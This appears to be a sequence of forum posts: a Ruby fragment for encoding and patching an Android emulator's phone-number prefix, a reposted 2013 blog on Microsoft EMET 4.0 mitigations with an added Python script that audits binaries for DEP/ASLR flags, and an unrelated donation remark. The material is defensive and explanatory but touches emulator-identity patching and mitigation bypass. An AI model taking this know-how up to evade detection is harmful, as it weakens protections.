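# Rebuilds the sprintf fragment from the post ("515525%d1" for the default
# prefix): six prefix digits fill three whole bytes, and the seventh shares a
# byte with the port's first digit, which the emulator fills in at runtime.
def prefix_format_fragment(prefix)
  raise ArgumentError, "prefix must be 7 digits" unless prefix.match?(/\A\d{7}\z/)
  msisdn_to_bcd(prefix[0, 6]) + "%d" + prefix[6]
end

# A replacement prefix is only safe to patch in place if it keeps the same
# length (the post's main caveat) and contains digits only.
def patchable_replacement?(new_prefix)
  new_prefix.match?(/\A\d{#{EMULATOR_PREFIX.length}}\z/)
end

if __FILE__ == $0
  puts msisdn_to_bcd(emulator_msisdn(5554))   # 5155255155f4
  puts bcd_to_msisdn("5155255155f4")          # 15555215554
  puts prefix_format_fragment("1876543")      # 816745%d3
end
```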
  23. [h=1]Microsoft EMET 4.0 might be the best enterprise security tool you're not using yet[/h]Posted by Chad Loder in Information Security on Apr 22, 2013 10:37:24 AM

Cross-posted from dangerous.net

Last week Microsoft announced their 4.0 beta release of EMET (Enhanced Mitigation Experience Toolkit). If you are responsible for securing Windows systems, you should definitely be looking at this free tool if you haven't already. EMET is a toolkit provided by Microsoft to configure security controls on Windows systems, making it more difficult for attackers to successfully launch exploits. EMET doesn't take the place of antivirus or patch management, but it does provide an important set of safeguards against not only existing exploits but also future 0-day exploits which have yet to be developed or released. Even the best signature-based antivirus programs don't do a good job at protecting from 0-days.

EMET allows administrators to exercise fine-grained control over Windows' built-in security features in Windows 7 and higher, including:

DEP (Data Execution Prevention)
ASLR (Address Space Layout Randomization)
SEHOP (Structured Exception Handling Overwrite Protection)
ROP (Return-Oriented Programming)

While DEP and ASLR have been supported by Microsoft since Windows XP SP2 and Windows Vista (respectively), one of the main weaknesses of this mitigation is that existing applications needed to be recompiled by the developer to "opt-in" to these security controls. A great benefit of EMET is that it allows administrators to "force" DEP and ASLR onto existing legacy applications. While there are many exploits out there which bypass DEP and ASLR, it's worth noting that the first versions of these exploits are sometimes thwarted by these controls, which buys you some time for either patches or antivirus detection to become available.

There are good reasons why the Australian DSD (Defense Signals Directorate) has included DEP and ASLR on its "Top 35 Mitigations" for two years running.

EMET 3.0 and 3.5 introduced the ability to manage EMET via GPO, putting installation and configuration within reach of the enterprise. EMET 4.0 builds on this feature set and includes some very useful new protections, including:

SSL certificate pinning. Allows mitigation of "man-in-the-middle" attacks by detecting situations where the Root CA for an SSL certificate has changed from the "pinned" value configured in EMET. For example, you can configure EMET to say "There is only a single trusted root CA that should ever be issuing certificates for acme.com, and if I see a certificate for any FQDN ending in .acme.com from a different CA, report this as a potential man-in-the-middle attack." You can pin the CA for entire domains or for individual certificates. EMET 4.0 beta ships with pinned certificates for login.live.com and login.microsoftonline.com, but administrators can add their own.

Enhanced ROP mitigation. There is a never-ending arms race between OS and application developers on the one side and exploit developers on the other side. When a new mitigation technique is developed by Microsoft, clever exploit developers work hard to find ways to bypass the mitigation. In the case of ROP mitigations, EMET 3.5 included some basic ROP mitigations that blocked assembly language "return" calls to memory addresses corresponding to known lists of low-level memory management functions in certain DLLs. This rendered a common exploit technique ineffective. However, exploit developers responded with adjusted techniques to bypass EMET's ROP mitigations, such as returning into the memory management code a few bytes beyond the function prologue. I don't have enough time or space to do this fascinating topic justice, but you can read a good overview of ROP exploit techniques here.

EMET 4.0 blocks some of these mitigation bypass techniques, which puts the onus back on exploit developers in this cat-and-mouse game. I'm looking forward to the first white paper detailing how the new mitigations can be bypassed.

Improved logging. With the new and improved EMET notifier agent, EMET 4.0 does a much better job at logging events to the Windows event log. This opens up the possibility of using a centralized event log monitoring system such as Microsoft System Center Operations Manager (SCOM) 2012 to act as an enterprise-wide early detection system for exploit attempts. Imagine having instantaneous alerting any time EMET blocked an attack on any Windows system across the enterprise. One could also use a free tool like event-log-to-syslog to gather event logs centrally, or even something like Splunk (with universal forwarders) if you don't mind breaking the bank.

Another benefit of centrally logging and analyzing EMET events is that it will give you early warning on EMET compatibility problems. Past versions of EMET have been known to cause problems with certain applications; for example, I found that the LastPass extension for Chrome needed certain EMET settings disabled in order to run. If you haven't used EMET before in your enterprise, you will definitely want to introduce EMET in a limited rollout before going enterprise-wide via GPO. Note any programs requiring exemption or settings customization and make sure those settings are reflected in the GPO policy.

Source: https://community.rapid7.com/community/infosec/blog/2013/04/22/microsoft-emet-40-might-be-the-best-enterprise-security-tool-youre-not-using-yet
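The post above notes that DEP and ASLR were originally "opt-in" mitigations that a developer had to compile into an application, and that EMET exists to force them onto legacy binaries that never opted in. The opt-in is visible in the PE header: the linker records /NXCOMPAT and /DYNAMICBASE as bits in the optional header's DllCharacteristics field. The following script is an added example (not code from the Rapid7 post, from EMET, or from Microsoft) that reads those bits so a defender can inventory which applications lack the flags before a limited EMET rollout. The flag values and header offsets come from the PE/COFF specification; `make_fake_pe` builds constructed, minimal header blobs for testing and does not produce a loadable image.

```python
"""Audit a PE image's DllCharacteristics for the DEP/ASLR opt-in flags.

Added example, not code from the Rapid7 post or from EMET. The linker sets
these flags (/NXCOMPAT, /DYNAMICBASE) at build time; a binary lacking them
is exactly the kind of "legacy application" the post says EMET can force
DEP and ASLR onto.
"""
import struct

# IMAGE_DLLCHARACTERISTICS_* values from the PE/COFF specification.
HIGH_ENTROPY_VA = 0x0020   # 64-bit ASLR may use the full address range
DYNAMIC_BASE = 0x0040      # ASLR opt-in (/DYNAMICBASE)
NX_COMPAT = 0x0100         # DEP opt-in (/NXCOMPAT)
NO_SEH = 0x0400            # image declares that it uses no SEH handlers

PE32_MAGIC = 0x10B
PE32PLUS_MAGIC = 0x20B


def audit_pe(data: bytes) -> dict:
    """Return which mitigations a PE image opts into.

    Raises ValueError on anything that is not a well-formed PE header, so a
    caller walking a directory tree can report unparsable files separately.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                      # 20-byte COFF file header
    (size_of_optional,) = struct.unpack_from("<H", data, coff + 16)
    opt = coff + 20                          # start of the optional header
    # DllCharacteristics sits at offset 70 of the optional header in both
    # the PE32 and PE32+ layouts, so the header must be at least 72 bytes.
    if size_of_optional < 72 or opt + 72 > len(data):
        raise ValueError("optional header too short")
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic not in (PE32_MAGIC, PE32PLUS_MAGIC):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    (dll_chars,) = struct.unpack_from("<H", data, opt + 70)
    return {
        "arch": "PE32+" if magic == PE32PLUS_MAGIC else "PE32",
        "dep": bool(dll_chars & NX_COMPAT),
        "aslr": bool(dll_chars & DYNAMIC_BASE),
        "high_entropy_va": bool(dll_chars & HIGH_ENTROPY_VA),
        "no_seh": bool(dll_chars & NO_SEH),
    }


def needs_emet_forcing(report: dict) -> list:
    """Name the mitigations EMET would have to force on this image."""
    missing = []
    if not report["dep"]:
        missing.append("DEP")
    if not report["aslr"]:
        missing.append("ASLR")
    return missing


def make_fake_pe(dll_chars: int, pe32plus: bool = False) -> bytes:
    """Build a minimal, constructed PE header for testing (not a real image)."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    magic = PE32PLUS_MAGIC if pe32plus else PE32_MAGIC
    opt_size = 240 if pe32plus else 224
    machine = 0x8664 if pe32plus else 0x14C
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<H", opt, 70, dll_chars)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    samples = [
        ("legacy app (no opt-in)", make_fake_pe(0)),
        ("DEP only", make_fake_pe(NX_COMPAT)),
        ("modern x64", make_fake_pe(NX_COMPAT | DYNAMIC_BASE | HIGH_ENTROPY_VA, True)),
    ]
    for label, blob in samples:
        rep = audit_pe(blob)
        print(label, rep, "EMET would force:", needs_emet_forcing(rep) or "nothing")
```

In a real rollout you would feed `audit_pe` the bytes of each executable and DLL under the application directories you plan to cover with GPO, and the images that come back with DEP or ASLR missing are the first candidates for EMET's forced settings, and the first to watch for compatibility problems in the logs. The flags describe only what the image asked for at link time; the effective policy on a host also depends on the system-wide DEP setting and on whatever EMET is forcing, so treat the audit as a worklist, not as a statement of runtime protection.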
  24. Yes, it's an idea... The main problem would be where that money comes from, because it's possible that some people would donate money that doesn't belong to them, and then who knows, problems might come up. Would there be other people interested? In practice only the hosting needs to be paid for, but if we collected something we could give out some prizes and organize some contests. Everything would be "open". Would there be others willing to donate?